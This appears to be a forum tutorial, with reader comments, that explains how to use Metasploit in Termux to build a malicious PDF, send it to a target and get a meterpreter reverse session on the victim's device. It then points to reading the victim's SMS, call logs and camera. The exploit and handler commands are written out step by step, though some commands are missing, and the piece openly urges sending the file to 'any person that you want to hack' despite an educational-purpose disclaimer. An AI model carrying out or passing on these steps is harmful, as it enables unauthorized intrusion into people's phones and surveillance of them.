How To Hack Android Phone By PDF File Using Metasploit Framework

Requirements :-

  1. Termux app( Download it from Play Store).

  2. Install Metasploit Framework in TermuX

  3. TermuX should be allowed to use External Storage (For this enter the command : “ termux-setup-storage ”).

  4. (Recommended not necessary) Use Hacker`s Keyboard for entering commands in TermuX easily.

Once you have completed all requirements we are ready to perform the hack.

Hacking Android Using Metasploit via a PDF File :-

Step 1 :- Launch Metasploit Console

First of all open Termux, if you are on android or just open your terminal if on Desktop.

Enter the following command to open Metasploit Console


If this kind of screen appears in front of you then we are good and if not there might be problem in installation of metasploit.


Step 2 :- Creating the Evil PDF (Payload)

Type the commands given below or simply copy paste them one by one to create the PDF File.

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Then you have to set your Localhost. For this you will need your IP Address, to check your IP Address type


in new seesion on termux or in another terminal window. Now come to your metasploit console and set your Localhost like this –


Replace the IP Address given in above command by your own IP Address

Now its time to setup port for this enter this command –

set LPORT 4444

You are free to use any port you want like 4564, 8080 etc.

Now its time to generate the Evil PDF File do this by below command –

set filename MyDocument.pdf

Here, you are also free to use any name you want just put it in place of MyDocument but be sure to put .pdf at the end of its name.

Now the last command is for final creation of file do this by typing this command –



Now within a second a message will be displayed saying that your PDF File is created at any default location. First copy that PDF File to your either Internal or External storage like this

mv <fille_location> <new_location>

And now you are done with creation part. Send it to any person that you want to hack. As soon as he/she will open that pdf file you will get the metasploit session.

Step 3 :- Exploitation

First open your metasploit console by typing


and then start writing below mentioned command –

use exploit/multi/handler/

set LHOST <your_IP>

set LPORT 4444



Note – Make sure to enter same IP and Port as you entered above in Step 2.

It will some time and then BOOM you will get meterpreter session. If such output appears then you got access to victim’s phone.

For seeing his/her sms, call logs, taking picture from victim’s camera you can use command given on the post about How To Hack An Android Phone With Another Android (Without Root) Android To Android Hacking in the last section.

Note – This is only for educational purpose and I’m not responsible for any misuse or harm done.



Really Nice share chief.
@SaM It’s good tutorial on how to do it, can you also explain a little details how to avoid/recognize such attacks.


It is showing that cannot move the file permission denied!

please give solution

cp /root/.msf4/local/filename.pdf /root/foldername/filename.pdf

use this instead bro @Justin_B